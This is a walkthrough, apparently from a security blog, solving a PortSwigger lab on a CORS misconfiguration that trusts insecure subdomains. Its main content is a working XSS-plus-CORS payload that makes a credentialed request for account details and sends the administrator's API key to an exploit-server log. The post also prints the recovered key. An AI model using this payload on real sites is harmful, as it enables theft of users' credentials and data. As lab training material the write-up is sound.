Lab Description Of CORS vulnerability with trusted insecure protocols
In this Post we will cover CORS vulnerability with trusted insecure protocols, This website has insecure CORS configurations that trust every subdomain without checking the protocol. In order to solve this lab, we will write JavaScript code that allows us to extract the administrator’s API key. To solve the lab, you can upload the code to an exploit server. The provided credentials are “wiener” and “peter”.
First, access the lab. After accessing it, open Burp and configure the proxy in your browser. Once you have done that, click on “My Account” and refresh the page.
Now, review the HTTP history. You will see a JSON request to “/accountDetails”. Send that request to the repeater tab in Burp.
Add the “Origin” header as shown below:
Origin: http://subdomain.lab-id
Replace “lab-id” with your lab’s domain.
Final version:
Origin: http://subdomain.0a4f006a04b14c4a807d0dfc00b80015.web-security-academy.net
Observe that the origin is reflected in the Access-Control-Allow-Origin header, confirming the presence of a CORS vulnerability.
Now, go back to the lab and view any product. You will see an option to check the stock. Intercept the “check stock” option in Burp Suite.
Inject an XSS payload into the product ID. It should work.
Next, go to the exploit server in the lab and store the script provided below:
<script>
document.location="http://stock.YOUR-LAB-ID.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>Modify the script by replacing “YOUR-LAB-ID” with your lab’s URL (domain) and “YOUR-EXPLOIT-SERVER-ID” with the URL of your exploit server.
final version
<script>
document.location="http://stock.0a4f006a04b14c4a807d0dfc00b80015.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0a4f006a04b14c4a807d0dfc00b80015.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0a31003c04a44cf380060cc1014e0038.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>Remember, you need to add three things in the code above. In the “document.location” line, replace “stock” with your lab’s URL. In the third line, replace the lab URL in the “req.open” section. Lastly, replace the exploit server’s URL in the last line.
Once you have stored the code on the exploit server and delivered the exploit to the victim, access the logs. You will find the administrator’s key. Clean it using the Burp decoder.
The code is now clean, and here is the API key for the administrator: 7Rdgi0KARqz2GXkaWvspBYozqsoxmOgl.
After submitting the key, you have successfully solved the PortSwigger Web Security lab on CORS vulnerability with trusted insecure protocols.
You can learn everything related to web security on our website. We upload the latest articles on web security topics daily, so stay with us.
Checkout the Post: CORS Vulnerability With Trusted Null Origin, As well.
FAQs
Website security refers to protecting a website or web application from cyberattacks, unauthorized access, or other security threats.
Web application security means protecting a website from cyberattacks. These attacks may include vulnerabilities such as SQL injection, XSS, file inclusion, and others.
It is always a good practice to use an up-to-date browser with timely updates. Keep your browser plugins up-to-date, avoid malicious websites and links, and always enable 2-factor authentication while avoiding clickjacking.
Searching for someone’s social security number or credit card information on the dark web is illegal and unethical. It is important to always avoid such activities and protect yourself and others from cyber threats.
